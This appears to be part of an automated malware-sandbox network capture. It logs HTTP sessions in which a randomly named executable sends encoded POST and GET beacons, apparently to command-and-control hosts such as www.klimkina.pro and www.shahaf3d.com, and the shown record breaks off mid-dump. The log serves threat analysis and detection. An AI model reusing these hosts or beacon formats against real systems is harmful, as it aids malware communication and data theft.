cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	162.241.2.254	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:24.286741018 CEST	452	OUT	GET /41br/?G0a=VFN0vBc0ol1ljnb0&9d=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rfhm5DYiSLYNIQJZpK4Rmnt3Mzv5831d4ZrhRkHRqInFW2dXaUcZHASEt HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:27:24.923527956 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:27:24 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Content-Length: 2361 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
Jun 5, 2024 18:27:24.923547029 CEST	1236	IN	Data Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/
Jun 5, 2024 18:27:24.923558950 CEST	151	IN	Data Raw: 2d 73 79 73 2f 69 6d 61 67 65 73 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 34 30 34 2e 73 76 67 22 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 2d 78 73 20 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 20 22 20 61 6c 74 3d 22 69 6c 6c 75 73 74 72 61 74 Data Ascii: -sys/images/illustration-404.svg" class="hidden-xs img-responsive " alt="illustration"> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	185.137.235.103	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:30.270272017 CEST	702	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 75 4e 64 70 48 66 30 65 4c 30 4a 2f 2f 34 69 52 44 31 63 77 4c 77 79 66 6e 54 54 46 79 54 55 42 37 36 43 68 75 2b 38 55 6f 50 2f 53 39 71 58 37 51 4f 41 38 62 30 65 6a 42 43 2b 37 69 31 2f 66 56 47 42 58 59 7a 63 7a 6c 42 72 6b 71 4e 56 62 79 69 43 4c 73 4c 71 64 57 6c 73 63 56 55 73 4f 76 66 2b 71 53 78 70 74 53 48 63 69 59 30 64 6e 70 6b 39 39 32 62 63 52 43 72 33 58 57 64 72 38 78 75 41 57 53 39 73 48 49 6b 4a 32 6e 66 51 44 75 33 65 51 74 43 34 74 39 71 72 53 6d 44 74 33 31 4e 73 6d 39 64 69 49 55 63 47 45 66 45 6b 6c 74 65 6d 66 51 4e 65 61 42 4c 67 63 41 78 72 4a 63 47 6c 75 36 77 3d 3d Data Ascii: 9d=V8EXo2f8tZ1yuNdpHf0eL0J//4iRD1cwLwyfnTTFyTUB76Chu+8UoP/S9qX7QOA8b0ejBC+7i1/fVGBXYzczlBrkqNVbyiCLsLqdWlscVUsOvf+qSxptSHciY0dnpk992bcRCr3XWdr8xuAWS9sHIkJ2nfQDu3eQtC4t9qrSmDt31Nsm9diIUcGEfEkltemfQNeaBLgcAxrJcGlu6w==
Jun 5, 2024 18:27:31.207969904 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Wed, 05 Jun 2024 16:26:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=6063b1254a94637c1a370261cc406f69; expires=Sat, 06-Jul-2024 16:27:31 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=9d1cd46e1270d926606b2039df3fa376; expires=Thu, 06-Jun-2024 16:27:31 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 12 Content-Encoding: gzip Data Raw: 35 34 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 51 6f dc 44 10 7e be fb 15 53 f3 50 90 ba 76 d2 24 25 4d 7c 27 d1 36 40 51 11 08 ca 03 aa 2a b4 67 af cf 9b 5b ef ba de f5 5d 0e f1 40 5b 81 00 21 21 f1 ce 43 ff 41 8a 9a 42 4b 1b fe 82 fd 8f 98 5d fb 2e d7 e4 d2 94 f4 a4 3b 7b 77 67 66 67 66 bf f9 66 2f 8c f9 18 b4 99 0a d6 f3 72 1a c7 5c 0e 89 51 f9 16 ac af e4 7b 5e bf db 0d 03 94 c0 67 37 bc 70 e3 b3 eb b7 bf fe 7c 07 52 93 89 7e 37 b4 0f 10 54 0e 7b 1e 93 28 1a a6 8c c6 fd 2e e0 27 cc 98 a1 28 67 72 c2 ee 95 7c dc f3 ae 2b 69 98 34 e4 f6 34 67 1e 44 cd a8 e7 19 b6 67 02 6b 68 1b a2 94 16 9a 99 5e 69 12 b2 e9 41 d0 ef 76 42 c3 8d 60 fd 8f 98 b9 ae 4a 5c 04 02 3b 45 a1 0a b8 c1 12 5a 0a 13 06 8d 00 4a ba 0d 25 cd 30 8c 31 67 93 5c 15 66 61 9b 09 8f 4d da 8b d9 98 47 8c b8 c1 25 e0 92 1b 4e 05 d1 11 c5 e0 57 fd 15 1b 6d 27 bc 40 08 dc 52 d4 26 02 ae 29 65 b4 29 68 0e 84 58 77 04 97 23 48 0b 96 f4 bc 20 2f 07 82 47 41 22 a8 21 25 0f 06 33 d1 20 d2 fa 68 e4 e3 c8 83 82 89 9e e7 92 ac 53 c6 cc c9 8d [TRUNCATED] Data Ascii: 54dWQoD~SPv$%M\|'6@Q*g[]@[!!CABK].;{wgfgff/r\Q{^g7p\|R~7T{(.'(gr\|+i44gDgkh^iAvB`J\;EZJ%01g\faMG%NWm'@R&)e)hXw#H /GA"!%3 hS>D+-O3Z7~^=Q<eiNcy.,vSWR:Gtrv{Jg APB6A=\|P4L}@P&e\|%`h#Ap=x<7jtdj(LJ~w78`9Ug=N#TMF{%+d8z8P%HP-(7p_XNgQ
Jun 5, 2024 18:27:31.207988024 CEST	765	IN	Data Raw: f0 b4 f0 8c 9c 11 a9 8a 0c 6b b4 65 a6 23 4b 2d 63 c5 5c e7 18 d9 16 0c 84 8a 46 db 00 4e a2 13 a6 6b 33 4e 9b 4b 70 89 d5 cb 48 2b d8 1a dc 82 35 a4 39 c7 75 db 30 50 45 cc 8a 2d d8 c4 19 ad 04 8f e1 9d b5 f5 f5 ab 1b 3b 5e bf fa bd 3a ac fe aa Data Ascii: ke#K-c\FNk3NKpH+59u0PE-;^:^VW}pY}_fp(}S=Wz#Cq/Op.eu`g%!X{X=#/~C5`lH]9g F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49716	185.137.235.103	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:32.802828074 CEST	722	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6c 6b 42 37 59 61 68 74 2f 38 55 76 50 2f 53 36 61 57 2f 64 75 41 33 62 30 61 72 42 47 36 37 69 31 37 66 56 48 78 58 62 43 63 30 6b 52 72 69 69 74 56 46 73 53 43 4c 73 4c 71 64 57 6c 6f 32 56 55 30 4f 76 76 4f 71 64 30 64 75 52 48 63 74 49 45 64 6e 6a 30 38 32 32 62 63 4a 43 71 37 70 57 66 54 38 78 76 77 57 53 73 73 45 43 6b 4a 77 6f 2f 52 41 68 6b 50 35 71 69 73 58 38 4b 62 2f 6e 7a 68 62 30 37 78 45 6e 2f 75 6b 4b 4e 2b 2f 62 47 41 54 36 34 37 71 53 4d 61 43 4d 70 55 39 66 47 4f 6a 52 55 45 71 73 43 76 2f 62 68 58 45 74 6c 52 4f 4e 41 44 6b 58 6c 42 67 5a 57 4d 3d Data Ascii: 9d=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvylkB7Yaht/8UvP/S6aW/duA3b0arBG67i17fVHxXbCc0kRriitVFsSCLsLqdWlo2VU0OvvOqd0duRHctIEdnj0822bcJCq7pWfT8xvwWSssECkJwo/RAhkP5qisX8Kb/nzhb07xEn/ukKN+/bGAT647qSMaCMpU9fGOjRUEqsCv/bhXEtlRONADkXlBgZWM=
Jun 5, 2024 18:27:34.074812889 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Wed, 05 Jun 2024 16:26:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=00ac84a236ce82f62d294db5fd6d1da0; expires=Sat, 06-Jul-2024 16:27:33 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=9d1cd46e1270d926606b2039df3fa376; expires=Thu, 06-Jun-2024 16:27:33 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 14 Content-Encoding: gzip Data Raw: 35 34 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 51 6f dc 44 10 7e be fb 15 53 f3 50 90 ba 76 d2 24 25 4d 7c 27 d1 36 40 51 11 08 ca 03 aa 2a b4 67 af cf 9b 5b ef ba de f5 5d 0e f1 40 5b 81 00 21 21 f1 ce 43 ff 41 8a 9a 42 4b 1b fe 82 fd 8f 98 5d fb 2e d7 e4 d2 94 f4 a4 3b 7b 77 67 66 67 66 bf f9 66 2f 8c f9 18 b4 99 0a d6 f3 72 1a c7 5c 0e 89 51 f9 16 ac af e4 7b 5e bf db 0d 03 94 c0 67 37 bc 70 e3 b3 eb b7 bf fe 7c 07 52 93 89 7e 37 b4 0f 10 54 0e 7b 1e 93 28 1a a6 8c c6 fd 2e e0 27 cc 98 a1 28 67 72 c2 ee 95 7c dc f3 ae 2b 69 98 34 e4 f6 34 67 1e 44 cd a8 e7 19 b6 67 02 6b 68 1b a2 94 16 9a 99 5e 69 12 b2 e9 41 d0 ef 76 42 c3 8d 60 fd 8f 98 b9 ae 4a 5c 04 02 3b 45 a1 0a b8 c1 12 5a 0a 13 06 8d 00 4a ba 0d 25 cd 30 8c 31 67 93 5c 15 66 61 9b 09 8f 4d da 8b d9 98 47 8c b8 c1 25 e0 92 1b 4e 05 d1 11 c5 e0 57 fd 15 1b 6d 27 bc 40 08 dc 52 d4 26 02 ae 29 65 b4 29 68 0e 84 58 77 04 97 23 48 0b 96 f4 bc 20 2f 07 82 47 41 22 a8 21 25 0f 06 33 d1 20 d2 fa 68 e4 e3 c8 83 82 89 9e e7 92 ac 53 c6 cc c9 8d [TRUNCATED] Data Ascii: 54dWQoD~SPv$%M\|'6@Q*g[]@[!!CABK].;{wgfgff/r\Q{^g7p\|R~7T{(.'(gr\|+i44gDgkh^iAvB`J\;EZJ%01g\faMG%NWm'@R&)e)hXw#H /GA"!%3 hS>D+-O3Z7~^=Q<eiNcy.,vSWR:Gtrv{Jg APB6A=\|P4L}@P&e\|%`h#Ap=x<7jtdj(LJ~w78`9Ug=N#TMF{%+d8z8P%HP-(7p_XNgQ
Jun 5, 2024 18:27:34.074825048 CEST	152	IN	Data Raw: f0 b4 f0 8c 9c 11 a9 8a 0c 6b b4 65 a6 23 4b 2d 63 c5 5c e7 18 d9 16 0c 84 8a 46 db 00 4e a2 13 a6 6b 33 4e 9b 4b 70 89 d5 cb 48 2b d8 1a dc 82 35 a4 39 c7 75 db 30 50 45 cc 8a 2d d8 c4 19 ad 04 8f e1 9d b5 f5 f5 ab 1b 3b 5e bf fa bd 3a ac fe aa Data Ascii: ke#K-c\FNk3NKpH+59u0PE-;^:^VW}pY}_fp(}S=Wz#Cq
Jun 5, 2024 18:27:34.074837923 CEST	613	IN	Data Raw: 83 17 80 2f 4f 70 f9 a0 be 8f 2e e0 f0 65 75 60 7f f6 ab 67 d5 93 ea c0 be f9 d0 ba f7 02 25 9e e2 cc 21 58 b7 f0 7b 58 3d 23 e8 ae f5 13 e7 0e ab c7 f5 2f a8 f2 bc 7e 00 f5 43 d4 de c7 35 b4 60 dd 6c 48 fe b8 c7 02 09 bd c9 a8 5d 39 e9 e9 12 67 Data Ascii: /Op.eu`g%!X{X=#/~C5`lH]9g F2/lS9i`LE>3[O>b-1J0=0(!zQ@!MYHHl9Ptn.)9Pg"X]%,__o6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49717	185.137.235.103	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:35.332253933 CEST	1735	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6d 45 42 37 4c 53 68 74 59 6f 55 75 50 2f 53 35 61 57 79 64 75 41 6d 62 30 69 76 42 44 69 72 69 33 7a 66 55 6c 35 58 50 6d 77 30 75 52 72 69 75 4e 56 59 79 69 43 53 73 50 47 5a 57 6c 59 32 56 55 30 4f 76 70 4b 71 55 42 70 75 58 48 63 69 59 30 64 37 70 6b 38 65 32 62 30 5a 43 71 2f 35 52 72 76 38 78 50 67 57 65 2b 30 45 42 45 4a 79 74 2f 52 69 68 6b 44 69 71 69 77 78 38 4b 66 5a 6e 30 6c 62 30 4d 63 36 30 4c 65 49 63 4d 43 6d 59 56 45 4e 33 75 37 68 66 61 58 30 45 4a 4d 6e 52 6c 61 31 49 6c 4a 71 34 69 7a 2b 4f 6a 58 71 6f 31 6f 59 63 33 65 4f 43 45 4d 6b 64 54 59 66 45 4b 6b 54 6d 4d 48 47 45 76 5a 2f 39 52 34 77 32 7a 5a 56 35 41 4b 65 66 54 43 30 52 63 2b 4e 30 47 72 45 74 5a 34 68 37 72 44 79 6f 6e 64 6d 6a 4d 4b 4b 44 63 7a 6b 4c 39 66 50 30 35 76 64 4d 39 76 49 6b 7a 65 74 32 73 31 30 34 61 47 4a 4b 6d 4f 68 35 6b 4f 4f 69 43 4e 72 43 50 76 35 76 52 6a 43 5a 32 68 [TRUNCATED] Data Ascii: 9d=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvymEB7LShtYoUuP/S5aWyduAmb0ivBDiri3zfUl5XPmw0uRriuNVYyiCSsPGZWlY2VU0OvpKqUBpuXHciY0d7pk8e2b0ZCq/5Rrv8xPgWe+0EBEJyt/RihkDiqiwx8KfZn0lb0Mc60LeIcMCmYVEN3u7hfaX0EJMnRla1IlJq4iz+OjXqo1oYc3eOCEMkdTYfEKkTmMHGEvZ/9R4w2zZV5AKefTC0Rc+N0GrEtZ4h7rDyondmjMKKDczkL9fP05vdM9vIkzet2s104aGJKmOh5kOOiCNrCPv5vRjCZ2hzq3lnsL31p/2Dmb/OojJTE1CuavUmUjV+H1CUoQYJGZgwj/zbmkrcHGwT3x4DsGYtXyqcHXz6eW+WmzFK+ZLVG4v/6PuICqIwmFXrV1iMeava0u9oQpPDajoH4D5FhgT7zfo/OpHrSmItDyYRKeYA0nUUtrElolRH8HMQHoKu8IEOSw5iunfAiWyodld4fPdh/pYUCTc3pDSUI8zhX5NGoVDqCnrqL10kBT6FS9va0T6EWYJHUnj8NI2inrRT2nLEaCvdzrpfrKVspNrf0m09Cj/i7ON3AH6DbJu80L1o6Z0kpFcjzB/i2kqbAR9PPaCvouAgYuGTOZcJG4N5V3pP9Hvs+Erv7OcIkposUoBxKQISRd+dql5TJGMSrYhlbHuhT+ROK0NT3A5Nx1AdXDdMcUoHe3JzLzl1AcbSOAns/LYDD+vCobAlDqunScZDevBWgZ5E51pyJyAQ74LE/Eum/sEjsruWy+4H4CrCK9wskTQ9HXp+s+XB1ftGoEvQ9nD+smaNGSLDYUtXjZb6mTEhXKBYQ4oi6h8B+9XsrS0UIhAjFEIEhUE04WvBdc7+1ydzuGlih2uIEhbd3EQbWUIZOxb0ylF1DOvIS7GJQEZlXh3cXp15lKnMxxURCoBowr1/nu6mBLVmJFT4UIQSgRtW5Nj0RjjS8n+KC [TRUNCATED]
Jun 5, 2024 18:27:36.265587091 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Wed, 05 Jun 2024 16:26:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=d0c65a234ece170c69c245dde91ea3e0; expires=Sat, 06-Jul-2024 16:27:36 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=9d1cd46e1270d926606b2039df3fa376; expires=Thu, 06-Jun-2024 16:27:36 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 14 Content-Encoding: gzip Data Raw: 35 34 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 51 6f dc 44 10 7e be fb 15 53 f3 50 90 ba 76 d2 24 25 4d 7c 27 d1 36 40 51 11 08 ca 03 aa 2a b4 67 af cf 9b 5b ef ba de f5 5d 0e f1 40 5b 81 00 21 21 f1 ce 43 ff 41 8a 9a 42 4b 1b fe 82 fd 8f 98 5d fb 2e d7 e4 d2 94 f4 a4 3b 7b 77 67 66 67 66 bf f9 66 2f 8c f9 18 b4 99 0a d6 f3 72 1a c7 5c 0e 89 51 f9 16 ac af e4 7b 5e bf db 0d 03 94 c0 67 37 bc 70 e3 b3 eb b7 bf fe 7c 07 52 93 89 7e 37 b4 0f 10 54 0e 7b 1e 93 28 1a a6 8c c6 fd 2e e0 27 cc 98 a1 28 67 72 c2 ee 95 7c dc f3 ae 2b 69 98 34 e4 f6 34 67 1e 44 cd a8 e7 19 b6 67 02 6b 68 1b a2 94 16 9a 99 5e 69 12 b2 e9 41 d0 ef 76 42 c3 8d 60 fd 8f 98 b9 ae 4a 5c 04 02 3b 45 a1 0a b8 c1 12 5a 0a 13 06 8d 00 4a ba 0d 25 cd 30 8c 31 67 93 5c 15 66 61 9b 09 8f 4d da 8b d9 98 47 8c b8 c1 25 e0 92 1b 4e 05 d1 11 c5 e0 57 fd 15 1b 6d 27 bc 40 08 dc 52 d4 26 02 ae 29 65 b4 29 68 0e 84 58 77 04 97 23 48 0b 96 f4 bc 20 2f 07 82 47 41 22 a8 21 25 0f 06 33 d1 20 d2 fa 68 e4 e3 c8 83 82 89 9e e7 92 ac 53 c6 cc c9 8d [TRUNCATED] Data Ascii: 54dWQoD~SPv$%M\|'6@Q*g[]@[!!CABK].;{wgfgff/r\Q{^g7p\|R~7T{(.'(gr\|+i44gDgkh^iAvB`J\;EZJ%01g\faMG%NWm'@R&)e)hXw#H /GA"!%3 hS>D+-O3Z7~^=Q<eiNcy.,vSWR:Gtrv{Jg APB6A=\|P4L}@P&e\|%`h#Ap=x<7jtdj(LJ~w78`9Ug=N#TMF{%+d8z8P%HP-(7p_XNgQ
Jun 5, 2024 18:27:36.265603065 CEST	765	IN	Data Raw: f0 b4 f0 8c 9c 11 a9 8a 0c 6b b4 65 a6 23 4b 2d 63 c5 5c e7 18 d9 16 0c 84 8a 46 db 00 4e a2 13 a6 6b 33 4e 9b 4b 70 89 d5 cb 48 2b d8 1a dc 82 35 a4 39 c7 75 db 30 50 45 cc 8a 2d d8 c4 19 ad 04 8f e1 9d b5 f5 f5 ab 1b 3b 5e bf fa bd 3a ac fe aa Data Ascii: ke#K-c\FNk3NKpH+59u0PE-;^:^VW}pY}_fp(}S=Wz#Cq/Op.eu`g%!X{X=#/~C5`lH]9g F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49718	185.137.235.103	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:37.863272905 CEST	447	OUT	GET /4mpz/?9d=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VpizPsaF86hmUooqlU0clf3MZo9yRfCdtfy1jNGRBq2V4+pMGerSvIMLN&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:27:38.813507080 CEST	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.20.0 Date: Wed, 05 Jun 2024 16:26:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: http://klimkina.pro/4mpz/?9d=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VpizPsaF86hmUooqlU0clf3MZo9yRfCdtfy1jNGRBq2V4+pMGerSvIMLN&G0a=VFN0vBc0ol1ljnb0 X-XSS-Protection: 1 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49719	64.46.118.35	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:44.250412941 CEST	702	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 69 33 49 78 4a 46 63 35 4a 2b 50 69 48 4c 55 76 69 30 73 30 4d 31 47 59 6e 37 2f 2f 50 44 4c 41 35 70 30 76 73 6a 48 6b 55 46 6d 6c 6f 74 63 47 36 4f 51 46 30 42 61 56 68 63 6e 71 4b 45 51 61 41 38 61 4f 67 46 2b 2b 56 41 34 44 2f 38 30 4e 43 56 37 42 43 57 6b 74 6c 45 4d 4b 70 6a 50 4e 33 36 6c 71 35 42 2f 31 6e 74 64 59 30 5a 6b 56 63 48 78 78 30 6f 42 4f 55 33 63 38 64 65 70 36 66 74 57 38 4e 34 6c 33 31 77 4e 50 58 38 77 44 5a 53 66 38 54 